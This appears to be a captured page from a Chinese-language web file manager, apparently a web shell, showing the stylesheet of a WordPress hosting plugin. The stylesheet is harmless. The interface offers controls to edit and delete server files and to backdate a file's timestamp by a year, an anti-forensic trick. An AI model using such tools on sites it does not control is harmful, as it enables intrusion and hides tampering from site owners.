文件操作 - switch-page.css
返回文件管理
返回主菜单
删除本文件
文件: /home/www/public/wp-content/plugins/ionos-assistant/css/switch-page.css
编辑文件内容
.extendify-help-center, #adminmenumain, #wpadminbar, #wpfooter, #wpbody-content > .update-nag, #wpbody-content > .notice { display: none !important; } .wrapper { position: fixed; display: flex; width: 100%; height: 100%; top: 0; left: 0; z-index: 99999; overflow-y: auto; background-color: white; } .header { display: flex; align-items: center; position: fixed; width: 100%; height: 80px; padding-left: 40px; z-index: +1; background-color: white; } .logo { vertical-align: top; height: 36px; } .onboardingpage { display: flex; flex-direction: column; position: relative; margin: auto; text-align: center; box-sizing: border-box; background-color: white; width: 1000px; height: auto; align-self: center; justify-self: center; } .onboardingpage>.headline{ font-size: 3em; line-height: 1em; padding: 0 30px; } .container { margin: 20px auto 0; } .options { display: flex; justify-content: space-evenly; } .option { position: relative;; width: 270px; height: auto; padding: 30px 15px 15px; background-color: white; border: 2px solid #cccccc; border-radius: 10px; margin-left: 20px; } .option:first-child { margin-left: 0; margin-right: 20px; } .option:hover{ border: solid 2px #cccccc; box-shadow: 0px 0px 8px #cccccc; } .option-content{ display: flex; flex-direction: column; align-items: center; } .option-content>img{ filter: grayscale(1); } .info-text{ position: absolute; top: -4%; padding: 3px; background-color: #2271b1; color: white; font-weight: 500; border-radius: 4px; } .link-btn { text-decoration: none; color: black; text-align: center; } .link-btn img { width: 80px; height: 80px; } .link-btn:hover{ color: black; } .link-btn:focus{ box-shadow: 0 0; } .checkbox-option { display: flex; align-items: center; margin: 10px 0 0 10px; width: 260px; text-align: left; font-size: 10px; } @media only screen and (max-width: 750px) { .onboardingpage>.headline { font-size: 1.5em; } .onboardingpage{ align-items: center; width: 100%; padding: 90px 0 0 0; } .container { margin-top: 10px; } .options { margin-top: 20px; flex-direction: column; } .option { margin: 0; } .option:first-child{ margin: 0 0 20px 0; } }
修改文件时间
将文件时间修改为当前时间的前一年
删除文件